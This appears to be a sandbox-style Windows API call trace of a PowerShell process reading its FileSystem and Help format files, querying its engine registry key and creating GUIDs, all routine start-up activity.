	[0054.633] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x6ede8663, Data2=0xf620, Data3=0x4e12, Data4=([0]=0xa9, [1]=0x7d, [2]=0x79, [3]=0x39, [4]=0xa0, [5]=0x30, [6]=0xe, [7]=0x6c))) returned 0x0
	[0054.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22dd2c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0054.634] GetLastError () returned 0x0
	[0054.634] SetErrorMode (uMode=0x1) returned 0x1
	[0054.634] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0054.634] GetLastError () returned 0x0
	[0054.634] GetFileType (hFile=0x2fc) returned 0x1
	[0054.634] SetErrorMode (uMode=0x1) returned 0x1
	[0054.634] GetFileType (hFile=0x2fc) returned 0x1
	[0054.634] ReadFile (in: hFile=0x2fc, lpBuffer=0x24c6400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x24c6400*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.635] GetLastError () returned 0x0
	[0054.635] ReadFile (in: hFile=0x2fc, lpBuffer=0x24c6400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x24c6400*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.636] GetLastError () returned 0x0
	[0054.636] ReadFile (in: hFile=0x2fc, lpBuffer=0x24c6400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x24c6400*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.636] GetLastError () returned 0x0
	[0054.636] ReadFile (in: hFile=0x2fc, lpBuffer=0x24c6400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x24c6400*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.636] GetLastError () returned 0x0
	[0054.637] ReadFile (in: hFile=0x2fc, lpBuffer=0x24c6400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x24c6400*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.637] GetLastError () returned 0x0
	[0054.637] ReadFile (in: hFile=0x2fc, lpBuffer=0x24c6400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x24c6400*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.637] GetLastError () returned 0x0
	[0054.637] ReadFile (in: hFile=0x2fc, lpBuffer=0x24c6400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x24c6400*, lpNumberOfBytesRead=0x22e294*=0x119, lpOverlapped=0x0) returned 1
	[0054.638] GetLastError () returned 0x0
	[0054.638] ReadFile (in: hFile=0x2fc, lpBuffer=0x24c6400, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x24c6400*, lpNumberOfBytesRead=0x22e294*=0x0, lpOverlapped=0x0) returned 1
	[0054.638] GetLastError () returned 0x0
	[0054.638] CloseHandle (hObject=0x2fc) returned 1
	[0054.638] GetLastError () returned 0x0
	[0054.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22ddf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0054.638] GetLastError () returned 0x0
	[0054.638] SetErrorMode (uMode=0x1) returned 0x1
	[0054.638] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24e73fc | out: lpFileInformation=0x24e73fc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0054.638] GetLastError () returned 0x0
	[0054.638] SetErrorMode (uMode=0x1) returned 0x1
	[0054.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0054.638] GetLastError () returned 0x0
	[0054.638] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e218 | out: phkResult=0x22e218*=0x2fc) returned 0x0
	[0054.638] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22e260, lpData=0x0, lpcbData=0x22e25c*=0x0 | out: lpType=0x22e260*=0x1, lpData=0x0, lpcbData=0x22e25c*=0x56) returned 0x0
	[0054.638] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22e260, lpData=0x3c3520, lpcbData=0x22e25c*=0x56 | out: lpType=0x22e260*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22e25c*=0x56) returned 0x0
	[0054.638] RegCloseKey (hKey=0x2fc) returned 0x0
	[0054.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0054.639] GetLastError () returned 0x0
	[0054.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22dd54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0054.639] GetLastError () returned 0x0
	[0054.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.640] GetLastError () returned 0x0
	[0054.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22da70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.640] GetLastError () returned 0x0
	[0054.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22da70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.640] GetLastError () returned 0x0
	[0054.641] VirtualQuery (in: lpAddress=0x22cf70, lpBuffer=0x22df70, dwLength=0x1c | out: lpBuffer=0x22df70*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.641] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xc5b82d5c, Data2=0xaf6b, Data3=0x4a6a, Data4=([0]=0xb5, [1]=0x2c, [2]=0x6d, [3]=0x44, [4]=0x36, [5]=0xc9, [6]=0x29, [7]=0xb0))) returned 0x0
	[0054.641] VirtualQuery (in: lpAddress=0x22cfc0, lpBuffer=0x22dfc0, dwLength=0x1c | out: lpBuffer=0x22dfc0*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.642] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x95fc227a, Data2=0x73c5, Data3=0x47b8, Data4=([0]=0xa4, [1]=0x6b, [2]=0xe4, [3]=0x1f, [4]=0xc1, [5]=0x47, [6]=0x55, [7]=0xf9))) returned 0x0
	[0054.642] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x1147f3ee, Data2=0xa180, Data3=0x4dc8, Data4=([0]=0xa6, [1]=0x85, [2]=0x2f, [3]=0xaf, [4]=0xe7, [5]=0x59, [6]=0xd3, [7]=0xfb))) returned 0x0
	[0054.642] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xea4fcc47, Data2=0xf509, Data3=0x468a, Data4=([0]=0xbd, [1]=0x9, [2]=0x6e, [3]=0xbc, [4]=0x79, [5]=0x9e, [6]=0xdf, [7]=0x9c))) returned 0x0
	[0054.642] VirtualQuery (in: lpAddress=0x22cfc0, lpBuffer=0x22dfc0, dwLength=0x1c | out: lpBuffer=0x22dfc0*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.642] VirtualQuery (in: lpAddress=0x22cfc0, lpBuffer=0x22dfc0, dwLength=0x1c | out: lpBuffer=0x22dfc0*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22dd2c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0054.642] GetLastError () returned 0x0
	[0054.643] SetErrorMode (uMode=0x1) returned 0x1
	[0054.643] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0054.643] GetLastError () returned 0x0
	[0054.643] GetFileType (hFile=0x2fc) returned 0x1
	[0054.643] SetErrorMode (uMode=0x1) returned 0x1
	[0054.643] GetFileType (hFile=0x2fc) returned 0x1
	[0054.643] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.644] GetLastError () returned 0x0
	[0054.645] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.645] GetLastError () returned 0x0
	[0054.645] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.645] GetLastError () returned 0x0
	[0054.645] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.645] GetLastError () returned 0x0
	[0054.646] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.646] GetLastError () returned 0x0
	[0054.646] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.646] GetLastError () returned 0x0
	[0054.646] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.647] GetLastError () returned 0x0
	[0054.647] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.647] GetLastError () returned 0x0
	[0054.664] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.664] GetLastError () returned 0x0
	[0054.664] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.664] GetLastError () returned 0x0
	[0054.664] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.664] GetLastError () returned 0x0
	[0054.665] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.665] GetLastError () returned 0x0
	[0054.665] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.665] GetLastError () returned 0x0
	[0054.665] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.665] GetLastError () returned 0x0
	[0054.665] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.665] GetLastError () returned 0x0
	[0054.666] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.666] GetLastError () returned 0x0
	[0054.669] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.669] GetLastError () returned 0x0
	[0054.669] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.669] GetLastError () returned 0x0
	[0054.669] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.669] GetLastError () returned 0x0
	[0054.669] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.669] GetLastError () returned 0x0
	[0054.669] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.670] GetLastError () returned 0x0
	[0054.670] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.670] GetLastError () returned 0x0
	[0054.670] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.670] GetLastError () returned 0x0
	[0054.670] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.670] GetLastError () returned 0x0
	[0054.671] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.671] GetLastError () returned 0x0
	[0054.671] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.671] GetLastError () returned 0x0
	[0054.671] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.671] GetLastError () returned 0x0
	[0054.671] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.671] GetLastError () returned 0x0
	[0054.671] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.672] GetLastError () returned 0x0
	[0054.672] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.672] GetLastError () returned 0x0
	[0054.672] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.672] GetLastError () returned 0x0
	[0054.672] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.672] GetLastError () returned 0x0
	[0054.677] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.677] GetLastError () returned 0x0
	[0054.678] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.678] GetLastError () returned 0x0
	[0054.678] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.678] GetLastError () returned 0x0
	[0054.678] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.678] GetLastError () returned 0x0
	[0054.678] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.678] GetLastError () returned 0x0
	[0054.679] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.679] GetLastError () returned 0x0
	[0054.679] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.679] GetLastError () returned 0x0
	[0054.679] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.679] GetLastError () returned 0x0
	[0054.679] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.680] GetLastError () returned 0x0
	[0054.680] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.680] GetLastError () returned 0x0
	[0054.680] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.680] GetLastError () returned 0x0
	[0054.680] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.680] GetLastError () returned 0x0
	[0054.680] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.680] GetLastError () returned 0x0
	[0054.681] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.681] GetLastError () returned 0x0
	[0054.681] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.681] GetLastError () returned 0x0
	[0054.681] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.681] GetLastError () returned 0x0
	[0054.681] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.681] GetLastError () returned 0x0
	[0054.681] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.681] GetLastError () returned 0x0
	[0054.682] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.682] GetLastError () returned 0x0
	[0054.682] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.682] GetLastError () returned 0x0
